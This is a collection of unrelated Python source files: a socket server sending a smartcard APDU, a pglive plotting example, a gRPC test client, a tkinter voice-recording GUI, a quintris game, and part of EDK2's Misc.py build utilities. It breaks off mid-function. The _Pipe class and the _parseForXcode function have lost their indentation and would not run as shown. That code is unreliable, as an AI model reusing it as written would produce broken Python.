    apdu = bytearray([0x00,0x07,0x00,0x84,0x00,0x00,0x00,0x00,0x01])
    try:
        conn.sendall(apdu)
        print(addr[0], ':', str(addr[1]),' sent: ',''.join('%02x ' % byte for byte in apdu))
        receivedBytes = conn.recv(4096)
        print(addr[0], ':', str(addr[1]),' received: ', ''.join('%02x ' % byte for byte in receivedBytes))
    finally:
        # fix: close the socket even when send/recv raises (it leaked before).
        conn.close()
while 1: # all connections are taken within this main thread and then handled by a new thread each
    conn, addr = s.accept()
    print('client '+addr[0] + ':' + str(addr[1]))
    threading.Thread(target=clienthandler, args=(conn,addr)).start()
s.close()  # NOTE(review): unreachable -- the `while 1` loop above never breaks
|
main_example.py
|
import signal
from threading import Thread
from PyQt6.QtWidgets import QMainWindow
import pglive.examples_pyqt6 as examples
from pglive.examples_pyqt6.designer_example.win_template import Ui_MainWindow
from pglive.sources.data_connector import DataConnector
from pglive.sources.live_plot import LiveLinePlot
class MainWindow(QMainWindow, Ui_MainWindow):
    """Create main window from template"""
    def __init__(self, parent=None):
        super().__init__(parent)
        # Instantiate the Designer-generated widget tree onto this window.
        self.setupUi(self)
win = MainWindow()
plot = LiveLinePlot()
# max_points=600 presumably bounds the retained samples -- confirm in pglive docs.
data_connector = DataConnector(plot, max_points=600)
win.plot_widget.addItem(plot)
# Generate the sine-wave data on a background thread.
Thread(target=examples.sin_wave_generator, args=(data_connector,)).start()
# Ctrl+C in the terminal stops the example's generator.
signal.signal(signal.SIGINT, lambda sig, frame: examples.stop())
win.show()
examples.app.exec()
# Stop the generator thread once the Qt event loop exits.
examples.stop()
|
_client_application.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.testing import _application_common
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.unit.framework.common import test_constants
@enum.unique
class Scenario(enum.Enum):
    """Client-side RPC scenarios this application can exercise."""
    UNARY_UNARY = 'unary unary'
    UNARY_STREAM = 'unary stream'
    STREAM_UNARY = 'stream unary'
    STREAM_STREAM = 'stream stream'
    CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
    CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
    CANCEL_UNARY_UNARY = 'cancel unary unary'
    CANCEL_UNARY_STREAM = 'cancel unary stream'
    INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
    """Outcome of a client application scenario.
    Attributes:
      kind: A Kind value describing the overall kind of scenario execution.
      code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
      details: A status details string. Only valid if kind is Kind.RPC_ERROR.
    """
    @enum.unique
    class Kind(enum.Enum):
        """Coarse classification of how a scenario ended."""
        SATISFACTORY = 'satisfactory'
        UNSATISFACTORY = 'unsatisfactory'
        RPC_ERROR = 'rpc error'
# Shared singleton outcomes for the two common no-RPC-error cases.
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while True:
if self._values:
return self._values.pop(0)
elif not self._open:
raise StopIteration()
else:
self._condition.wait()
def __next__(self): # (Python 3 Iterator Protocol)
return self._next()
def next(self): # (Python 2 Iterator Protocol)
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def close(self):
with self._condition:
self._open = False
self._condition.notify_all()
def _run_unary_unary(stub):
    """Run the unary-unary scenario; satisfactory iff the canned response arrives."""
    response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
    matched = response == _application_common.UNARY_UNARY_RESPONSE
    return _SATISFACTORY_OUTCOME if matched else _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
    """Run the unary-stream scenario; satisfactory iff the response stream is empty."""
    response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
    try:
        next(response_iterator)
    except StopIteration:
        return _SATISFACTORY_OUTCOME
    return _UNSATISFACTORY_OUTCOME
def _run_stream_unary(stub):
    """Send three canned requests; satisfactory iff the canned response and OK status."""
    requests = iter((_application_common.STREAM_UNARY_REQUEST,) * 3)
    response, call = stub.StreUn.with_call(requests)
    ok = (response == _application_common.STREAM_UNARY_RESPONSE
          and call.code() is grpc.StatusCode.OK)
    return _SATISFACTORY_OUTCOME if ok else _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
    """Exercise a bidirectional stream: each request should elicit exactly
    two responses, and no responses may arrive after the stream closes."""
    request_pipe = _Pipe()
    response_iterator = stub.StreStre(iter(request_pipe))
    # Interleave: send one request, consume its two responses, repeat.
    request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
    first_responses = next(response_iterator), next(response_iterator)
    request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
    second_responses = next(response_iterator), next(response_iterator)
    request_pipe.close()
    # After closing the request stream, any further response is a failure.
    try:
        next(response_iterator)
    except StopIteration:
        unexpected_extra_response = False
    else:
        unexpected_extra_response = True
    if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
        second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
        and not unexpected_extra_response):
        return _SATISFACTORY_OUTCOME
    else:
        return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
    """Fire THREAD_CONCURRENCY stream-unary RPCs concurrently via futures."""
    future_calls = tuple(
        stub.StreUn.future(iter((_application_common.STREAM_UNARY_REQUEST,) *
                           3))
        for _ in range(test_constants.THREAD_CONCURRENCY))
    for future_call in future_calls:
        if future_call.code() is grpc.StatusCode.OK:
            response = future_call.result()
            if _application_common.STREAM_UNARY_RESPONSE != response:
                return _UNSATISFACTORY_OUTCOME
        else:
            return _UNSATISFACTORY_OUTCOME
    else:
        # for/else: reached only when every call completed OK with the
        # expected response (i.e. the loop was not exited by a return).
        return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
    """Run RPC_CONCURRENCY stream-stream scenarios on separate threads."""
    condition = threading.Condition()
    # One slot per thread; a slot becomes truthy once its scenario finishes.
    outcomes = [None] * test_constants.RPC_CONCURRENCY
    def run_stream_stream(index):
        outcome = _run_stream_stream(stub)
        with condition:
            outcomes[index] = outcome
            condition.notify()
    for index in range(test_constants.RPC_CONCURRENCY):
        thread = threading.Thread(target=run_stream_stream, args=(index,))
        thread.start()
    with condition:
        while True:
            if all(outcomes):
                # Every thread reported; succeed only if all succeeded.
                for outcome in outcomes:
                    if outcome.kind is not Outcome.Kind.SATISFACTORY:
                        return _UNSATISFACTORY_OUTCOME
                else:
                    # for/else: no unsatisfactory outcome was found.
                    return _SATISFACTORY_OUTCOME
            else:
                condition.wait()
def _run_cancel_unary_unary(stub):
    """Start a UnUn call, wait for its initial metadata, then cancel it."""
    call = stub.UnUn.future(
        _application_common.UNARY_UNARY_REQUEST)
    metadata = call.initial_metadata()
    cancelled = call.cancel()
    if cancelled and metadata is not None:
        return _SATISFACTORY_OUTCOME
    return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
    """Confirm a never-ending request stream is cut off by the call deadline."""
    def endless_requests():
        while True:
            yield _application_common.STREAM_UNARY_REQUEST
    call = stub.StreUn.future(
        endless_requests(),
        timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
    if call.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
        return _SATISFACTORY_OUTCOME
    return _UNSATISFACTORY_OUTCOME
# Maps each Scenario member to the callable that exercises it against a stub.
_IMPLEMENTATIONS = {
    Scenario.UNARY_UNARY: _run_unary_unary,
    Scenario.UNARY_STREAM: _run_unary_stream,
    Scenario.STREAM_UNARY: _run_stream_unary,
    Scenario.STREAM_STREAM: _run_stream_stream,
    Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
    Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
    Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
    Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
    """Execute the named scenario over *channel*, reporting an Outcome.

    RPC failures are converted to RPC_ERROR outcomes rather than raised.
    """
    stub = services_pb2_grpc.FirstServiceStub(channel)
    try:
        return _IMPLEMENTATIONS[scenario](stub)
    except grpc.RpcError as error:
        return Outcome(Outcome.Kind.RPC_ERROR, error.code(), error.details())
|
main.py
|
from tkinter import *
from threading import Thread
from record import record_to_file
from features import mfcc
from anntester_single import *
import scipy.io.wavfile as wav
class Application(Frame):
    """Tkinter frame with a record button and a one-line status display."""
    def createWidgets(self):
        """Create the image button and the status text box."""
        self.button_image = PhotoImage(file="button.gif")
        self.RECORD = Button(self, image=self.button_image, width="100",
                             height="100", command=self.record_buttonpress)
        self.RECORD.pack()
        self.TEXTBOX = Text(self, height="1", width="30")
        self.TEXTBOX.pack()
    def __init__(self, master=None):
        Frame.__init__(self, master)
        self.pack()
        self.createWidgets()
        # Seed the prompt, define display styles, then lock the box read-only.
        self.TEXTBOX.insert(INSERT, "Press to record")
        self.TEXTBOX.tag_config("recording", foreground="red", justify="center")
        self.TEXTBOX.tag_config("success", foreground="darkgreen", justify="center")
        self.TEXTBOX.configure(state="disabled")
    def record_buttonpress(self):
        """Kick off recording on a worker thread so the GUI stays responsive."""
        worker = Thread(target=record_and_test, args=(self.TEXTBOX, self.RECORD))
        worker.start()
def record_and_test(textbox, button, filename="test_files/test.wav"):
    """Record a clip to *filename*, classify it with the ANN, show the result.

    Runs on a worker thread (see Application.record_buttonpress); drives the
    passed-in widgets and re-enables the button when finished.

    NOTE(review): tag_remove("recording", "1.0") covers only one character,
    but the preceding delete() already discarded the tagged text, so this
    appears harmless — confirm before changing.
    """
    # Disable button and change text
    button.configure(state="disabled")
    textbox.configure(state="normal")
    textbox.delete("1.0", END)
    textbox.insert(INSERT, "Recording")
    textbox.tag_add("recording", "1.0", END)
    textbox.configure(state="disabled")
    # Record to file
    record_to_file(filename)
    # Feed into ANN
    testNet = testInit()
    inputArray = extractFeature(filename)
    print(len(inputArray))
    outStr = feedToNetwork(inputArray,testNet)
    # Change text and re-enable button
    textbox.configure(state="normal")
    textbox.delete("1.0", END)
    textbox.tag_remove("recording", "1.0")
    textbox.insert(INSERT, outStr)
    textbox.tag_add("success", "1.0", END)
    textbox.configure(state="disabled")
    button.configure(state="normal")
if __name__ == '__main__':
    # Display GUI
    # Build the Tk root window, mount the Application frame, and block in the
    # event loop until the window is closed.
    root = Tk()
    app = Application(master=root)
    app.mainloop()
    #root.destroy()
|
AnimatedQuintris.py
|
# "Fancier" animated interactive version of quintris. v0.2
# D. Crandall, Sept 2021
#
# DON'T MODIFY THIS FILE! Or else we might not be able to grade your submission properly.
#
from QuintrisGame import *
class AnimatedQuintris(QuintrisGame):
    """Interactive quintris variant: daemon threads redraw the board and
    apply gravity while the player thread handles keyboard input."""
    def __init__(self):
        QuintrisGame.__init__(self)
    # This thread just repeated displays the current game board to the screen.
    def display_thread(self):
        while 1:
            self.print_board(True)
            print("Controls: b moves left, n rotates, m moves right, h flips, spacebar drops\n")
            time.sleep(0.1)
    # This thread is in charge of making the piece fall over time.
    def gravity_thread(self):
        while True:
            # Drop one row every half-second until the next step would collide.
            while 1:
                time.sleep(0.5)
                self.row = self.row+1
                if(QuintrisGame.check_collision(*self.state, self.piece, self.row+1, self.col)): break
            # place new piece in final resting spot
            self.finish()
    # This thread just starts things up
    def start_game(self, player):
        # Daemon threads die automatically when the player thread exits.
        # NOTE(review): setDaemon() is deprecated in modern Python, but this
        # file's header says it must not be modified.
        t2 = threading.Thread(target=self.gravity_thread)
        t2.setDaemon(True)
        t3 = threading.Thread(target=self.display_thread)
        t3.setDaemon(True)
        t2.start()
        t3.start()
        player.control_game(self)
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from struct import pack
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from .DataType import *
from .BuildToolError import *
from CommonDataClass.DataClass import *
from .Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import uuid
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
import subprocess
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store file time stamp for quick re-access
gFileTimeStampCache = {} # {file path : file time stamp}
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
    """ Parse map file to get variable offset in current EFI file

    @param mapfilepath    Map file absolution path
    @param efifilepath:   EFI binary file full path
    @param varnames       iteratable container whose elements are variable names to be searched
    @return List whos elements are tuple with variable name and raw offset,
            or None if the map file cannot be read or is empty
    """
    try:
        # 'with' closes the handle even when readlines() raises; the original
        # leaked the file object on a mid-read failure.
        with open(mapfilepath, 'r') as f:
            lines = f.readlines()
    except Exception:
        # Preserve the original contract: any read failure yields None.
        # (Narrowed from a bare 'except:' that also swallowed SystemExit.)
        return None

    if not lines:
        return None

    firstline = lines[0].strip()
    # GCC ld map files begin with the archive-member listing.
    if (firstline.startswith("Archive member included ") and
        firstline.endswith(" file (symbol)")):
        return _parseForGCC(lines, efifilepath, varnames)
    # Xcode (ld64) map files begin with a "# Path:" header.
    if firstline.startswith("# Path:"):
        return _parseForXcode(lines, efifilepath, varnames)
    # Anything else is treated as an MSVC-style map file.
    return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
    """ Parse map file generated by GCC linker

    Returns a list of (varname, hex file-offset) tuples for the requested
    variable names, resolved against the EFI image's section headers.
    """
    # State machine: 0 = preamble, 1 = saw "Memory Configuration",
    # 2 = saw "Linker script and memory map", 3 = inside "START GROUP".
    status = 0
    sections = []
    varoffset = []
    for index, line in enumerate(lines):
        line = line.strip()
        # status machine transection
        if status == 0 and line == "Memory Configuration":
            status = 1
            continue
        elif status == 1 and line == 'Linker script and memory map':
            status = 2
            continue
        elif status ==2 and line == 'START GROUP':
            status = 3
            continue
        # status handler
        if status == 3:
            m = valuePatternGcc.match(line)
            if m is not None:
                sections.append(m.groups(0))
            for varname in varnames:
                Str = ''
                # cannot pregenerate these RegExes: they embed varname.
                m = re.match("^.data.(%s)" % varname, line)
                if m is not None:
                    m = re.match(".data.(%s)$" % varname, line)
                    if m is not None:
                        # Symbol name alone on this line; address is on the next.
                        Str = lines[index + 1]
                    else:
                        Str = line[len(".data.%s" % varname):]
                    if Str:
                        m = pcdPatternGcc.match(Str.strip())
                        if m is not None:
                            # (name, symbol addr, section base addr, section name)
                            varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
    if not varoffset:
        return []
    # get section information from efi file
    efisecs = PeImageClass(efifilepath).SectionHeaderList
    if efisecs is None or len(efisecs) == 0:
        return []
    #redirection
    # Offset between the map file's .text base and the image's .text base.
    redirection = 0
    for efisec in efisecs:
        for section in sections:
            if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
                redirection = int(section[1], 16) - efisec[1]
    ret = []
    for var in varoffset:
        for efisec in efisecs:
            # Translate the symbol's virtual address into a raw file offset.
            if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
                ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
    return ret
def _parseGeneral(lines, efifilepath, varnames):
    """Parse an MSVC-style linker map file, returning (varname, hex offset)
    tuples resolved against the EFI image's section headers."""
    status = 0    #0 - beginning of file; 1 - PE section definition; 2 - symbol table
    secs = []    # key = section name
    varoffset = []
    symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
    for line in lines:
        line = line.strip()
        if startPatternGeneral.match(line):
            status = 1
            continue
        if addressPatternGeneral.match(line):
            status = 2
            continue
        if line.startswith("entry point at"):
            # Past the symbol table; nothing after this is parsed.
            status = 3
            continue
        if status == 1 and len(line) != 0:
            m = secReGeneral.match(line)
            assert m is not None, "Fail to parse the section in map file , line is %s" % line
            sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
            secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
        if status == 2 and len(line) != 0:
            for varname in varnames:
                m = symRe.match(line)
                assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
                sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
                sec_no = int(sec_no, 16)
                sym_offset = int(sym_offset, 16)
                vir_addr = int(vir_addr, 16)
                # cannot pregenerate this RegEx since it uses varname from varnames.
                m2 = re.match('^[_]*(%s)' % varname, sym_name)
                if m2 is not None:
                    # fond a binary pcd entry in map file
                    for sec in secs:
                        # Keep it only if the symbol lies inside this section.
                        if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
                            varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
    if not varoffset: return []
    # get section information from efi file
    efisecs = PeImageClass(efifilepath).SectionHeaderList
    if efisecs is None or len(efisecs) == 0:
        return []
    ret = []
    for var in varoffset:
        index = 0
        for efisec in efisecs:
            index = index + 1
            # Match by section name first, then fall back to section number.
            if var[1].strip() == efisec[0].strip():
                ret.append((var[0], hex(efisec[2] + var[2])))
            elif var[4] == index:
                ret.append((var[0], hex(efisec[2] + var[2])))
    return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
    """Copy an INF that is built more than once to a uniquely-named temp INF.

    @param  Path        Original PathClass object
    @param  BaseName    New file base name (the FILE_GUID override)
    @param  Workspace   Workspace the relative path is resolved against

    @retval PathClass   New object whose .Path points at the temporary INF
    """
    Filename = os.path.split(Path.File)[1]
    if '.' in Filename:
        Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
    else:
        Filename = BaseName + Path.BaseName
    #
    # If -N is specified on command line, cache is disabled
    # The directory has to be created
    #
    DbDir = os.path.split(GlobalData.gDatabasePath)[0]
    if not os.path.exists(DbDir):
        os.makedirs(DbDir)
    #
    # A temporary INF is copied to database path which must have write permission
    # The temporary will be removed at the end of build
    # In case of name conflict, the file name is
    # FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
    #
    TempFullPath = os.path.join(DbDir,
                                Filename)
    RtPath = PathClass(Path.File, Workspace)
    #
    # Modify the full path to temporary path, keep other unchanged
    #
    # To build same module more than once, the module path with FILE_GUID overridden has
    # the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
    # in DSC which is used as relative path by C files and other files in INF.
    # A trick was used: all module paths are PathClass instances, after the initialization
    # of PathClass, the PathClass.Path is overridden by the temporary INF path.
    #
    # The reason for creating a temporary INF is:
    # Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
    # the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
    # A different key for the same module is needed to create different output directory,
    # retrieve overridden PCDs, library instances.
    #
    # The BaseName is the FILE_GUID which is also the output directory name.
    #
    #
    RtPath.Path = TempFullPath
    RtPath.BaseName = BaseName
    #
    # If file exists, compare contents
    #
    if os.path.exists(TempFullPath):
        with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
            # Identical content: reuse the existing temp copy as-is.
            if f1.read() == f2.read():
                return RtPath
    # Remember the copy so ClearDuplicatedInf() can delete it at build end.
    _TempInfs.append(TempFullPath)
    shutil.copy2(str(Path), TempFullPath)
    return RtPath
## Remove temporary created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
    """Delete every temporary INF recorded in _TempInfs, emptying the list."""
    while _TempInfs:
        path = _TempInfs.pop()
        if os.path.exists(path):
            os.remove(path)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
    """Convert 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' into C initializer form.

    @param  Guid    Registry-format GUID string

    @retval string  The GUID as a C structure initializer
    """
    fields = Guid.split('-')
    parts = ['{']
    # First three fields are emitted whole.
    parts.append('0x' + fields[0] + ', ')
    parts.append('0x' + fields[1] + ', ')
    parts.append('0x' + fields[2] + ', ')
    # Fields 4 and 5 become the eight-byte array.
    parts.append('{0x' + fields[3][0:2] + ', 0x' + fields[3][2:4])
    for offset in range(0, 12, 2):
        parts.append(', 0x' + fields[4][offset:offset + 2])
    parts.append('}}')
    return ''.join(parts)
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
    """Convert a 16-byte C array initializer into registry GUID format.

    @param  GuidValue   The GUID value as a byte-array initializer string

    @retval string      Registry-format GUID, or '' if the input is malformed
    """
    cleaned = GuidValue.lower()
    for junk in ('{', '}', ' ', ';'):
        cleaned = cleaned.replace(junk, '')
    byte_text = cleaned.split(',')
    if len(byte_text) != 16:
        return ''
    try:
        byte_vals = [int(b, 16) for b in byte_text]
    except ValueError:
        return ''
    # Bytes 0-3 form a little-endian dword, 4-5 and 6-7 little-endian words;
    # the remaining eight bytes are emitted in order.
    order = (3, 2, 1, 0, 5, 4, 7, 6, 8, 9, 10, 11, 12, 13, 14, 15)
    return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % tuple(
        byte_vals[i] for i in order)
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
    """Convert a C-structure GUID initializer to registry format.

    @param  GuidValue   The GUID value in C structure format

    @retval string      Registry-format GUID, or '' if the input is malformed
    """
    if not GlobalData.gGuidCFormatPattern.match(GuidValue):
        return ''
    cleaned = GuidValue.lower()
    for junk in ('{', '}', ' ', ';'):
        cleaned = cleaned.replace(junk, '')
    fields = cleaned.split(',')
    if len(fields) != 11:
        return ''
    try:
        values = [int(field, 16) for field in fields]
    except ValueError:
        return ''
    return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % tuple(values)
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
    """Convert a C-structure GUID initializer to underscore-separated form.

    @param  GuidValue   The GUID value in C structure format

    @retval string      GUID in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
    """
    cleaned = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
    fields = cleaned.split(",")
    if len(fields) != 11:
        # EdkLogger.error raises, aborting before the format below runs.
        EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
    return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % tuple(
        int(field, 16) for field in fields)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
    """Create a directory (and any missing parents), tolerating blank input.

    @param  Directory   The directory path; None or blank is a no-op

    @retval True        The directory exists or was created successfully
    @retval False       Creation failed (permissions, invalid path, ...)
    """
    if Directory is None or Directory.strip() == "":
        return True
    try:
        if not os.access(Directory, os.F_OK):
            os.makedirs(Directory)
    except (OSError, IOError):
        # Narrowed from a bare 'except:' that also swallowed
        # KeyboardInterrupt/SystemExit; makedirs failures raise OSError.
        return False
    return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
    """Remove a directory; with Recursively=True, delete its contents first.

    @param  Directory       The directory name; None/blank/missing is a no-op
    @param  Recursively     Whether to delete files and sub-directories inside

    NOTE(review): the recursion relies on os.chdir, so concurrent callers
    would race on the process working directory — confirm single-threaded use.
    """
    if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
        return
    if Recursively:
        CurrentDirectory = os.getcwd()
        os.chdir(Directory)
        for File in os.listdir("."):
            if os.path.isdir(File):
                RemoveDirectory(File, Recursively)
            else:
                os.remove(File)
        # Restore the working directory before removing the (now empty) dir.
        os.chdir(CurrentDirectory)
    os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
    """Store content in file only when its content is changed.

    Useful for "make"-style systems deciding what to rebuild.

    @param  File            The path of file
    @param  Content         The new content of the file
    @param  IsBinaryFile    The flag indicating if the file is binary file or not

    @retval True            If the file content is changed and the file is renewed
    @retval False           If the file content is the same
    """
    if not IsBinaryFile:
        Content = Content.replace("\n", os.linesep)

    if os.path.exists(File):
        try:
            # 'with' closes the read handle; the original open(...).read()
            # leaked the file object.
            with open(File, "rb") as Fd:
                if Content == Fd.read():
                    return False
        except Exception:
            EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)

    DirName = os.path.dirname(File)
    if not CreateDirectory(DirName):
        EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
    else:
        if DirName == '':
            DirName = os.getcwd()
        if not os.access(DirName, os.W_OK):
            EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)

    try:
        # 'with' guarantees the handle is closed even if write() fails.
        with open(File, "wb") as Fd:
            Fd.write(Content)
    except IOError as X:
        EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)

    return True
## Make a Python object persistent on file system
#
# @param Data The object to be stored in file
# @param File The path of file to store the object
#
def DataDump(Data, File):
    """Persist a Python object to File via pickle; failures are logged, not raised.

    @param  Data    The object to be stored in file
    @param  File    The path of file to store the object
    """
    handle = None
    try:
        handle = open(File, 'wb')
        pickle.dump(Data, handle, pickle.HIGHEST_PROTOCOL)
    except:
        EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
    finally:
        if handle is not None:
            handle.close()
## Restore a Python object from a file
#
# @param File The path of file stored the object
#
# @retval object A python object
# @retval None If failure in file operation
#
def DataRestore(File):
    """Restore a Python object previously pickled into File.

    @param  File    The path of file the object was stored in

